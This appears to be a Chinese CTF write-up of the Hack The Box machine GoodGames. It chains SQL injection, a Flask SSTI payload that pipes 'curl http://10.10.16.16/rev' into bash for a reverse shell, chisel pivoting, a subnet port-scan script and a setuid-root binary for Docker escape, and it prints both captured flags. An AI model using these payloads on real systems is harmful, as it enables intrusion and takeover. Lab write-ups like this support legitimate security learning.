[Meachines] [Easy] GoodGames SQLI+Flask SSTI+Docker逃逸权限提升

Information Gathering

IP Address Opening Ports
10.10.11.130 TCP:80

$ sudo masscan -p1-65535,U:1-65535 10.10.11.130 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports
$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
$ nmap -Pn -sV -sC -p$ports 10.10.11.130

bash 复制代码
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.51
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-title: GoodGames | Community and Store
Service Info: Host: goodgames.htb

SQLI

# echo '10.10.11.130 goodgames.htb' >> /etc/hosts

$ dirsearch -u 'http://goodgames.htb'

$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://FUZZ.goodgames.htb -H "Host: FUZZ.goodgames.htb" -ac

email=1%40gmail.com'--+&password=123

email=1%40gmail.com'%20OR%20'1'='1'--+&password=123

$ sqlmap -r sqli -p email --batch

$ sqlmap -r sqli -p email --batch -D main -T user --dump

email:admin@goodgames.htb
username:admin
password:superadministrator

# echo '10.10.11.130 internal-administration.goodgames.htb' >> /etc/hosts

Flask SSTI Injection

http://internal-administration.goodgames.htb/login

bash 复制代码
POST /settings HTTP/1.1
Host: internal-administration.goodgames.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Origin: http://internal-administration.goodgames.htb
Connection: close
Referer: http://internal-administration.goodgames.htb/settings
Cookie: session=.eJwlzjmOAjEQQNG7OJ6gNttlLtOyaxFopBmpGyLE3WlE-F_0n2XLPY5rudz3R_yU7eblUmbNTKJOMTv2xlEnLvZRZa6cyFlXApt0B8yTWRbWcKjWxBynA7euMwcNqoxhGCBJQ62zDFouHEMJZWlVc9eVlg20Z-uGiOUceRyxf28-acee2_3_N_5OSIfAIS1aR1OxaO5jgShFCrBKJVTXVl5vIF4_KQ.Z5IPJg.xnuJSS0C6PcZvOJeMd6iV8AclZE
Upgrade-Insecure-Requests: 1


name={{9*9}}

name={``{config.__class__.__init__.__globals__['os'].popen('curl%20http://10.10.16.16/rev|bash').read()}}

User.txt

388118f20c90df4d38744d9ac624dd43

Privilege Escalation : Docker Escape

Server:

$ chisel server -p 8000 --reverse

Client:

# ./chisel_1.10.1_linux_amd64 client 10.10.16.16:8000 R:localhost:1080:socks

Server:

$ vim 10.10.11.130.conf

Client:

# arp -a

https://raw.githubusercontent.com/S12cybersecurity/Pivoting_Enum/refs/heads/main/pivoting.sh

sh 复制代码
#!/bin/bash

RED="\e[31m"
GREEN="\e[32m"
YELLOW="\e[33m"
ENDCOLOR="\e[0m"

hostname=$(hostname)

echo -e "${GREEN}[+] Basic Information on $hostname machine${ENDCOLOR}"


echo -e "\n${YELLOW}List of Machine Local IP's:${ENDCOLOR}"
ifconfig | awk '{print $(NF - -4), $NF}' | grep "172."  | cut -c 2-
ifconfig | awk '{print $(NF - -4), $NF}' | grep "192." | cut -c 2-
ifconfig | awk '{print $(NF - -4), $NF}' | grep "10." | cut -c 2- | grep -v "0x10<host>"

echo -e "\n${YELLOW}Utilities:${ENDCOLOR}"

which aws
which netcat
which nc.traditional
which curl
which ping
which gcc
which g++
which make
which gdb
which base64
which socat
which python
which python2
which python3
which perl
which php
which ruby
which xterm
which sudo
which wget
which nc 
which nmap
which fping

echo -e "\n"

echo -e "${GREEN}[+] Network Recon\n${ENDCOLOR}"

if [ -z $1 ]
then
    echo -e "${RED}[*] Syntax: <NETWORK/S TO SCAN> Format: 192.168.0 ${ENDCOLOR}"
    exit 1
fi

if [[ $# =~ 1 ]]
then
   hosts=($1)
   echo -e "${GREEN}List of Networks: ${ENDCOLOR}"$hosts
fi

if [[ $# =~ 2 ]]
then
   hosts=($1 $2)
   echo -e "${GREEN}List of Networks: ${ENDCOLOR}"${hosts[0]}", "${hosts[1]}
fi

if [[ $# =~ 3 ]]
then
   hosts=($1 $2 $3)
   echo -e "${GREEN}List of Networks: ${ENDCOLOR}"${hosts[0]}", "${hosts[1]}", "${hosts[2]}
fi

if [[ $# =~ 4 ]]
then
   hosts=($1 $2 $3 $4)
   echo -e "${GREEN}List of Networks: ${ENDCOLOR}"${hosts[0]}", "${hosts[1]}", "${hosts[2]}", "${hosts[3]}
fi


for host in ${hosts[@]}; do
	echo -e "\n${YELLOW}[*] Enumerating Network: $host${ENDCOLOR}\n"
	for i in $(seq 1 254); do
		timeout 0.5 bash -c "ping -c 1 $host.$i" &> /dev/null
		a=$(echo $?)
		if [[ $a =~ 0 ]]
		then
			array[${#array[@]}]=$host.$i
			echo $host.$i >> hosts.txt
			b=$(ping -c 1 $host.$i | grep 'ttl' | awk '{print $(NF - 2), $NF}' | cut -c 5-7)
			if [[ $b =~ 64 ]] || [[ $b =~ 63 ]] || [[ $b =~ 62 ]]
                	then
				echo "[+] HOST $host.$i  ACTIVE  [OS=Linux]"
			
			elif [[ $b =~ 128 ]] || [[ $b =~ 127 ]] || [[ $b =~ 126 ]]
			then
				echo "[+] HOST $host.$i  ACTIVE  [OS=Windows]"
			else
				echo "[+] HOST $host.$i  ACTIVE  [OS=UNDETECTED]"
			fi
		fi
        done; wait
done

for host in ${array[@]}; do
        echo -e "\n${YELLOW}[*] Scanning Ports on: $host${ENDCOLOR}\n"
        for port in $(seq 1 10001); do
                timeout 1 bash -c "echo '' > /dev/tcp/$host/$port" 2> /dev/null && echo -e "\t[+] PORT $host:$port OPEN" &
        done; wait
done

# ./host_discovery.sh 172.19.0

Server:

$ sudo proxychains -f 10.10.11.130.conf ssh augustus@172.19.0.1

Docker用户创建test文件在augustus目录中test所有者是root

复制代码
#include <stdio.h>
#include <stdlib.h>

int main() {
        setuid(0);
        system("/bin/bash");
}

# wget http://10.10.16.16/suid.c

# gcc suid.c -o suid

# chmod u+s suid

augustus@GoodGames:~$ ./suid

Root.txt

a42c76fe28f8a2556fa7e8794f133c15

相关推荐
_Jimmy_26 分钟前
Python 协程库如何使用以及有哪些使用场景
python
aqi001 小时前
15天学会AI应用开发(十七)使用LangGraph实现会话记忆功能
人工智能·python·大模型·ai编程·ai应用
第一程序员1 小时前
Rust Agent 子进程执行:Command 之前,先定义输入和超时
python·rust·github
skywalk81631 小时前
设计并实现段言的 C FFI 绑定机制 @Trae
c语言·开发语言·python·编程
weixin_BYSJ19872 小时前
SpringBoot + MySQL 乒乓球运动员信息管理系统项目实战--附源码04954
java·javascript·spring boot·python·django·flask·php
EQUINOX13 小时前
【论文阅读】| MoCo精读
论文阅读·人工智能·python·深度学习·机器学习
用户8356290780514 小时前
使用 Python 自动化 Excel 公式和函数:完整指南
后端·python
敲代码的嘎仔4 小时前
实习日志day6--实习日志day6--title命名规范化&businessType纠正&补充缺失的@Log注解&报警与通信模块补充&产出阶段总结文档
java·开发语言·人工智能·git·python·实习·大二
江华森4 小时前
Python 实现高德地图找房(一):环境搭建与数据爬虫
开发语言·爬虫·python
VIP_CQCRE5 小时前
用 Ace Data Cloud 快速接入 OpenAI Chat Completions:对话、流式、多轮和多模态一篇打通
python·ai·openai·api·教程